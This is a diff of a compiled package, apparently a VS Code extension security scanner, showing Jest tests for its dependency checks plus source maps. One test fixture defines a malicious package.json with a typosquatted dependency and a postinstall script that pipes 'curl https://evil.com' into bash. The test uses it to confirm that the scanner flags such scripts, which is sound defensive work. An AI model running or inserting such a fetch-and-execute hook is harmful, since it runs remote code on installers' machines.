+    });
+});
+describe("checkDependencies (integration)", () => {
+    it("runs all checks on a malicious package.json", () => {
+        const contents = makeContents({
+            name: "evil-extension",
+            dependencies: {
+                "event-stream": "^3.3.4", // Known malicious
+                lodahs: "^4.0.0", // Typosquat
+            },
+            scripts: {
+                postinstall: "curl https://evil.com | bash", // Malicious script
+            },
+        });
+        const zooData = makeZooData(["event-stream"]);
+        const findings = checkDependencies(contents, zooData);
+        expect(findings.some((f) => f.id === "MALICIOUS_NPM_PACKAGE")).toBe(true);
+        expect(findings.some((f) => f.id === "TYPOSQUAT_PACKAGE")).toBe(true);
+        expect(findings.some((f) => f.id === "MALICIOUS_LIFECYCLE_SCRIPT")).toBe(true);
+    });
+    it("returns empty array for clean extension", () => {
+        const contents = makeContents({
+            name: "good-extension",
+            dependencies: {
+                express: "^4.0.0",
+                lodash: "^4.0.0",
+            },
+            scripts: {
+                build: "tsc",
+                test: "jest",
+            },
+        });
+        const zooData = makeZooData();
+        const findings = checkDependencies(contents, zooData);
+        expect(findings).toHaveLength(0);
+    });
+    it("handles missing package.json", () => {
+        const manifest = {
+            name: "test-extension",
+            publisher: "test",
+            version: "1.0.0",
+        };
+        const contents = {
+            manifest,
+            files: new Map(),
+            basePath: "/test",
+        };
+        const zooData = makeZooData();
+        const findings = checkDependencies(contents, zooData);
+        expect(findings).toHaveLength(0);
+    });
+    it("handles invalid package.json", () => {
+        const manifest = {
+            name: "test-extension",
+            publisher: "test",
+            version: "1.0.0",
+        };
+        const files = new Map();
+        files.set("package.json", Buffer.from("not valid json", "utf8"));
+        const contents = { manifest, files, basePath: "/test" };
+        const zooData = makeZooData();
+        const findings = checkDependencies(contents, zooData);
+        expect(findings).toHaveLength(0);
+    });
+});
+//# sourceMappingURL=dependencies.test.js.map

package/dist/scanner/checks/dependencies.test.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"dependencies.test.js","sourceRoot":"","sources":["../../../src/scanner/checks/dependencies.test.ts"],"names":[],"mappings":"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"}

package/dist/scanner/checks/finding-quality.test.d.ts

@@ -0,0 +1,8 @@
+/**
+ * Tests for finding quality and metadata completeness
+ *
+ * These tests verify that findings have sufficient context for human/agent triage.
+ * Run with: VSIX_AUDIT_INTEGRATION_TESTS=1 npm test -- finding-quality
+ */
+export {};
+//# sourceMappingURL=finding-quality.test.d.ts.map

package/dist/scanner/checks/finding-quality.test.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"finding-quality.test.d.ts","sourceRoot":"","sources":["../../../src/scanner/checks/finding-quality.test.ts"],"names":[],"mappings":"AAAA;;;;;GAKG"}